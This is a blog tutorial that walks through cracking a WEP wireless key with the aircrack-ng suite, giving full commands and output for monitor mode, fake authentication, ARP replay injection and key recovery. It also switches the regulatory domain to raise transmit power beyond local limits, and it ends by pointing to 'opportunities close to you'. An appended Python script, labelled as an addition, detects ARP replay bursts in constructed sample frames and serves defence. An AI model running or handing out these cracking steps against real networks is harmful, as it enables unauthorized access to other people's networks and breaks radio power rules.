ALEXANDRE BORGES BLOG


Cracking WEP Networks

Author: Alexandre Borges
Date: FEB/20/2014
Revision: 1.0
http://alexandreborges.org

When I published the first document about cracking wireless networks (http://alexandreborgesbrazil.files.wordpress.com/2014/02/cracking_wireless.pdf), some friends of mine asked me to write a document about cracking WEP and, as I'm teaching a CEH course this week, I decided to write this short article. Honestly, I believe most security professionals know how to crack a WEP wireless network, but what follows is a very straightforward document that tries to avoid common mistakes I've seen in other blogs, such as pinning a channel for the wireless search.

For this demonstration I've used Kali Linux (http://www.kali.org/downloads/), a Cisco home wireless router configured to use WEP and the very famous external wireless card Alfa AWUS036H. It's completely possible to execute the same steps using an internal wireless card, as long as it's supported by the aircrack suite. Let's go:

1) The first step is to collect information about the network interface cards installed in the system:

    root@hacker:~# iwconfig
    wlan1     IEEE 802.11bg  ESSID:off/any
              Mode:Managed  Access Point: Not-Associated   Tx-Power=27 dbm
              Encryption key:off
              Power Management:off

    vmnet8
    eth0
    lo

    wlan0     IEEE 802.11bgn  ESSID:"SOLARIS11"
              Mode:Managed  Frequency:2.437 GHz  Access Point: CC:B2:55:D0:16:54
              Bit Rate=130 Mb/s   Tx-Power=16 dbm
              Encryption key:off
              Power Management:on
              Link Quality=61/70  Signal level=-49 dbm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:796  Invalid misc:50   Missed beacon:0

    vmnet1

2) To change some network interface attributes, the wlan1 interface was taken down, we changed its regulatory country to Bolivia (a location where a higher transmission power is permitted) and we altered the txpower property to 30 (almost 1 W):

    root@hacker:~# ifconfig wlan1 down
    root@hacker:~# iw reg set BO
    root@hacker:~# iwconfig wlan1 txpower 30

3) I've configured the wlan1 interface in monitor mode (something like promiscuous operation) and brought it up:

    root@hacker:~# iwconfig wlan1 mode monitor
    root@hacker:~# ifconfig wlan1 up
    root@hacker:~# iwconfig wlan1
    wlan1     IEEE 802.11bg  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=30 dbm
              Power Management:off

4) So far we've configured the basic infrastructure, so let's move on to cracking a WEP wireless network. The next command starts a general scan for wireless networks (over all channels):

    root@hacker:~# airodump-ng wlan1

For this test we're going to choose the wireless network named Hacker.

Figure 1

5) The main task is to collect packets from the Hacker wireless network, because we need around 50,000 IVs (initialization vectors) to be able to crack and find out the WEP key. So we need to start collecting packets and to associate with this target wireless network.

Starting to collect packets (and IVs):

    root@hacker:~# airodump-ng -c 1 --bssid 00:25:9C:76:62:8F -w cap_course_1.txt wlan1

From the previously executed command:

    -c       channel on which the Hacker wireless network is configured, according to Figure 1
    --bssid  the router MAC address
    -w       write to the file named cap_course_1.txt

To associate with the Hacker wireless network:

    root@hacker:/# aireplay-ng -1 0 -a 00:25:9C:76:62:8F wlan1

Figure 2

    23:34:11  Waiting for beacon frame (BSSID: 00:25:9C:76:62:8F) on channel 1
    23:34:12  Sending Authentication Request (Open System)
    23:34:14  Sending Authentication Request (Open System) [ACK]
    23:34:14  Authentication successful
    23:34:14  Sending Association Request [ACK]
    23:34:14  Association successful :-) (AID: 1)

The -1 option means fake authentication, 0 means the reassociation timing (seconds) and -a is the BSSID (AP MAC).

6) With packets being collected, it's time to force IV production to accelerate the process, and this is done by executing:

    root@hacker:~# aireplay-ng -3 -b 00:25:9C:76:62:8F -a 00:25:9C:76:62:8F wlan1

Figure 3

The -3 option selects the ARP request replay attack and -b is the BSSID.

The big question is: when is it recommended to stop the packet collection? As at least 50,000 IVs are needed, a good guess is to collect more than 200,000 packets, but it's only a rough guess. I suggest you leave packets being collected until around 300,000 or 400,000 packets to ensure you'll break WEP.

Wow, I almost forgot: the Hacker wireless network must be accessed often to cause a big production of IVs. It's a relevant condition.

Finally, the great moment: let's crack and find out the WEP key:

    root@hacker:~# aircrack-ng cap_course_1.txt-01.cap

Figure 4

Amazing! The WEP key was found: AA:BB:CC:DD:EE. Nowadays it isn't so common to find a WEP network, but there are lots of opportunities close to you.

Have a nice day.

Alexandre Borges
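Seen from the monitoring side, the ARP request replay of step 6 has a clear signature: the injected frame is a captured one sent again unchanged, so one transmitter repeats the same IV and frame length at a high rate, while normal WEP traffic uses a fresh IV per frame. The Python detector below is an added example, not part of the original article or of the aircrack suite. The record layout (timestamp, transmitter MAC, IV, length), the MAC addresses, the window and the threshold are assumptions, and the frames are constructed sample data.

```python
from collections import defaultdict, deque


def find_replayed_frames(frames, window=1.0, threshold=20):
    """Flag (transmitter, IV, length) triples seen >= threshold times in `window` s.

    frames: iterable of (timestamp_s, transmitter_mac, iv_hex, length_bytes),
    a hypothetical record layout for frames logged by a monitoring sensor.
    Returns {triple: peak number of copies inside one window}.
    """
    recent = defaultdict(deque)   # triple -> timestamps still inside the window
    alerts = {}
    for ts, transmitter, iv, length in sorted(frames):
        key = (transmitter, iv, length)
        seen = recent[key]
        seen.append(ts)
        while ts - seen[0] > window:      # drop copies older than the window
            seen.popleft()
        if len(seen) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(seen))
    return alerts


def build_sample():
    """Constructed traffic: one normal station and one replaying station."""
    frames = []
    # Normal station: 20 frames/s, every frame carries a fresh IV.
    for i in range(200):
        frames.append((i * 0.05, "02:00:00:00:00:10", f"{i:06x}", 120 + i % 40))
    # Replaying station: one frame re-sent 200 times in 0.4 s, IV never changes.
    for i in range(200):
        frames.append((2.0 + i * 0.002, "02:00:00:00:00:66", "a1b2c3", 68))
    return frames


if __name__ == "__main__":
    for (mac, iv, length), copies in find_replayed_frames(build_sample()).items():
        print(f"possible ARP replay: {mac} repeated IV {iv} "
              f"({length}-byte frame) {copies} times within 1 s")
```

The short window matters: the WEP IV is only 24 bits wide, so IVs also repeat in legitimate traffic over long periods, and only bursts of identical frames should raise an alert.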